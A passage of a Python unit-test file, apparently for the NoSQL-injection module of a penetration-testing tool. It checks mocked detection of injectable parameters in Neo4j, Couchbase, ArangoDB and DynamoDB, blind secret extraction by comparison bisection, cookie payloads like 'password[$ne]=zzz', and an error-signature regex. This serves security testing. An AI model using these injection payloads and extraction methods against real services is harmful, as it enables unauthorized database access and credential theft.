self.assertEqual(rows, [["1", "luther", "blisset"], ["2", "fluffy", "bunny"]])
def test_html_table_with_header(self):
page = "<table><tr><th>id</th><th>user</th></tr><tr><td>1</td><td>luther</td></tr></table>"
columns, rows = ni._records(page)
self.assertEqual(columns, ["id", "user"])
self.assertEqual(rows, [["1", "luther"]])
def test_json_array_of_objects(self):
page = '{"results": [{"id": 1, "username": "luther", "password": null}, {"id": 2, "username": "fluffy"}]}'
columns, rows = ni._records(page)
self.assertEqual(columns, ["id", "username", "password"])
self.assertEqual(rows, [["1", "luther", "NULL"], ["2", "fluffy", ""]])
def test_unstructured_returns_none(self):
self.assertIsNone(ni._records("<html><body>just some prose, no records here</body></html>"))
def _numeric(place, parameter, value):
# numeric-context oracle: 'OR 1=1' is always-true (rows), 'AND 1=2' is false (no rows)
if "OR 1=1" in value:
return MATCH
if "AND 1=2" in value:
return NOMATCH
return MATCH if value == "1" else NOMATCH
class TestNoSqlNumeric(unittest.TestCase):
"""Numeric-context (unquoted) break-out, e.g. 'WHERE id = <input>': detected via OR/AND, with the
always-true response carried as the in-band dump template"""
def setUp(self):
self._f, self._fv = ni._fetch, ni._fetchValue
ni._fetch = lambda *args, **kwargs: ""
ni._fetchValue = _numeric
ni.conf.parameters = {"GET": "id=1"}
ni.conf.paramDict = {"GET": {"id": "1"}}
def tearDown(self):
ni._fetch, ni._fetchValue = self._f, self._fv
def test_resolve_numeric(self):
vector = ni._resolve("GET", "id", "id")
self.assertEqual(vector.dbms, "Neo4j")
self.assertEqual(vector.bypass, "1 OR 1=1")
self.assertIsNone(vector.lengthValue) # numeric field -> in-band only, no blind extraction
def test_skips_non_numeric(self):
ni.conf.parameters = {"GET": "name=luther"}
self.assertIsNone(ni._detectNumeric("GET", "name")) # only applies to a numeric field value
def _numericN1ql(place, parameter, value):
# numeric-context Couchbase: OR/AND boolean plus the N1QL-only REGEXP_CONTAINS discriminator
m = re.search(r"REGEXP_CONTAINS\('ab', '([^']*)'\)", value)
if m:
return MATCH if re.search(m.group(1), "ab") is not None else NOMATCH
if "OR 1=1" in value:
return MATCH
if "AND 1=2" in value:
return NOMATCH
return MATCH if value == "1" else NOMATCH
class TestNoSqlNumericN1QL(unittest.TestCase):
"""A numeric Couchbase point is disambiguated from Neo4j by the N1QL-only REGEXP_CONTAINS probe"""
def setUp(self):
self._f, self._fv = ni._fetch, ni._fetchValue
ni._fetch = lambda *args, **kwargs: ""
ni._fetchValue = _numericN1ql
ni.conf.parameters = {"GET": "id=1"}
def tearDown(self):
ni._fetch, ni._fetchValue = self._f, self._fv
def test_resolve_numeric_couchbase(self):
dbms, _, bypass = ni._detectNumeric("GET", "id")
self.assertEqual(dbms, "Couchbase")
self.assertEqual(bypass, "1 OR 1=1")
def _numericAql(place, parameter, value):
# numeric-context ArangoDB: only the ||/&& family diverges (OR/AND and REGEXP_CONTAINS do not)
return MATCH if "|| 1==1" in value else NOMATCH
class TestNoSqlNumericAQL(unittest.TestCase):
"""A numeric ArangoDB point is detected via the ||/&& family once OR/AND yields no divergence"""
def setUp(self):
self._f, self._fv = ni._fetch, ni._fetchValue
ni._fetch = lambda *args, **kwargs: ""
ni._fetchValue = _numericAql
ni.conf.parameters = {"GET": "id=1"}
def tearDown(self):
ni._fetch, ni._fetchValue = self._f, self._fv
def test_resolve_numeric_arango(self):
dbms, _, bypass = ni._detectNumeric("GET", "id")
self.assertEqual(dbms, "ArangoDB")
self.assertEqual(bypass, "1 || 1==1")
def _partiql(place, parameter, value):
# DynamoDB PartiQL string-context oracle: 'field >= prefix' matches the bound record iff
# SECRET >= prefix (ordered comparison, the basis of the comparison-bisection extraction);
# 'begins_with(field, prefix)' matches iff SECRET starts with prefix
m = re.search(r">= '(.*)$", value)
if m:
return MATCH if SECRET >= m.group(1).replace("''", "'") else NOMATCH
m = re.search(r"begins_with\([^,]+, '(.*?)'\) OR '1'='2", value)
if m:
return MATCH if SECRET.startswith(m.group(1)) else NOMATCH
return NOMATCH
class TestNoSqlPartiQL(unittest.TestCase):
"""DynamoDB PartiQL: no regexp engine, so a value is recovered by ordered string comparison
(field >= 'prefix') bisected over the printable-ASCII range"""
def setUp(self):
self._fv = ni._fetchValue
ni._fetchValue = _partiql
ni.conf.parameters = {"GET": "username=luther&password=x"}
ni.conf.paramDict = {"GET": {"password": "x"}}
def tearDown(self):
ni._fetchValue = self._fv
def test_extract(self):
value = ni._partiqlValue("GET", "password", "", "password")
self.assertEqual(value, SECRET)
def test_dump_binds_sibling(self):
columns, rows = ni._partiqlDump("GET", "password", "password")
self.assertEqual(columns, ["password"])
self.assertEqual(rows, [[SECRET]])
def test_dump_without_sibling_returns_none(self):
ni.conf.parameters = {"GET": "password=x"} # no sibling to pin a single record
ni.conf.paramDict = {"GET": {"password": "x"}}
self.assertIsNone(ni._partiqlDump("GET", "password", "password"))
def _numericDdb(place, parameter, value):
# numeric-context DynamoDB: OR/AND boolean plus the PartiQL-only begins_with discriminator
m = re.search(r"begins_with\('ab', '([^']*)'\)", value)
if m:
return MATCH if "ab".startswith(m.group(1)) else NOMATCH
if "OR 1=1" in value:
return MATCH
if "AND 1=2" in value:
return NOMATCH
return MATCH if value == "1" else NOMATCH
class TestNoSqlNumericDynamoDB(unittest.TestCase):
"""A numeric DynamoDB point is disambiguated from Neo4j/Couchbase by the PartiQL-only begins_with probe"""
def setUp(self):
self._f, self._fv = ni._fetch, ni._fetchValue
ni._fetch = lambda *args, **kwargs: ""
ni._fetchValue = _numericDdb
ni.conf.parameters = {"GET": "id=1"}
def tearDown(self):
ni._fetch, ni._fetchValue = self._f, self._fv
def test_resolve_numeric_dynamodb(self):
dbms, _, bypass = ni._detectNumeric("GET", "id")
self.assertEqual(dbms, "DynamoDB")
self.assertEqual(bypass, "1 OR 1=1")
class TestNoSqlCookiePlace(unittest.TestCase):
"""Cookie place: parameters split/join on ';' (not '&') and the segment routes to the Cookie header"""
def setUp(self):
ni.conf.cookieDel = None
ni.conf.parameters = {ni.PLACE.COOKIE: "session=abc; username=luther; password=x"}
ni.conf.paramDict = {ni.PLACE.COOKIE: {"password": "x"}}
def test_delimiter(self):
self.assertEqual(ni._delim(ni.PLACE.COOKIE), ";")
self.assertEqual(ni._delim(ni.PLACE.GET), "&")
def test_original_value(self):
self.assertEqual(ni._originalValue(ni.PLACE.COOKIE, "username").strip(), "luther")
def test_replace_segment(self):
out = ni._replaceSegment(ni.PLACE.COOKIE, "password", "password[$ne]=zzz")
self.assertIn("session=abc", out)
self.assertIn("username=luther", out)
self.assertIn("password[$ne]=zzz", out)
self.assertEqual(out.count(";"), 2) # 3 segments -> 2 delimiters (no '&')
self.assertNotIn("&", out)
def test_constraint_binds_siblings(self):
constraint = ni._constraint(ni.PLACE.COOKIE, "password")
self.assertIn("u.session='abc'", constraint)
self.assertIn("u.username='luther'", constraint)
class TestNoSqlErrorRegex(unittest.TestCase):
"""The heuristic regex must match real back-end error structures, not bare product names (so an
article merely mentioning MongoDB/Elasticsearch/Cassandra is never flagged as injectable)"""
from lib.core.settings import NOSQL_ERROR_REGEX
POSITIVES = (
'MongoServerError: unknown operator: $foo',
'{"ok":0,"errmsg":"unknown top level operator: $where","code":2,"codeName":"BadValue"}',
'MongoServerError: Regular expression is invalid: missing )',
'CastError: Cast to ObjectId failed',
'{"error":"query_parse_error","reason":"Invalid operator: $foo"}',
'{"error":{"root_cause":[{"type":"query_shard_exception","reason":"Failed to parse query [luther\']"}]},"status":400}',
'{"type":"x_content_parse_exception","reason":"[1:18] [bool] failed to parse"}',
'{"error":{"msg":"org.apache.solr.search.SyntaxError: Cannot parse \'username:\'","code":400}}',
"Neo.ClientError.Statement.SyntaxError: Invalid input",
'Neo4j error: Failed to parse string literal. The query must contain an even number of non-escaped quotes. (line 1, column 30) "MATCH (u:User) WHERE u.id = 1"',
"<b>Neo4j error:</b> Invalid input ''x'': expected an expression, 'FOREACH', 'MATCH', 'MERGE', 'UNWIND', 'WITH' or <EOF>",
'{"error":true,"errorNum":1501,"errorMessage":"AQL: syntax error, unexpected quoted string"}',
"ResponseError: line 1:38 no viable alternative at input",
"SyntaxException: line 1:42 mismatched input ''' expecting EOF",
'{"error":{"root_cause":[{"type":"number_format_exception","reason":"For input string"}]},"status":400}',
'ReplyError: WRONGTYPE Operation against a key holding the wrong kind of value',
'ReplyError: ERR Error compiling script (new function): user_script:1: unexpected symbol',
'CLIENT_ERROR bad command line format',
'error parsing query: found WHERE, expected identifier at line 1',
'org.apache.phoenix.exception.PhoenixIOException: failed',
)
NEGATIVES = (
"This article explains how MongoDB, CouchDB and Elasticsearch handle queries.",
"Cassandra and Redis are popular NoSQL databases; Neo4j is a graph database.",
"We migrated from Solr to OpenSearch last year. ArangoDB is multi-model.",
"<html><body><b>Results:</b><table><tr><td>1</td><td>luther</td></tr></table></body></html>",
"<html><body><b>Invalid credentials</b></body></html>",
)
def test_matches_real_errors(self):
for sample in self.POSITIVES:
self.assertIsNotNone(re.search(self.NOSQL_ERROR_REGEX, sample), "should match: %s" % sample)
def test_ignores_benign_text(self):
for sample in self.NEGATIVES:
self.assertIsNone(re.search(self.NOSQL_ERROR_REGEX, sample), "should NOT match: %s" % sample)
if __name__ == "__main__":
unittest.main()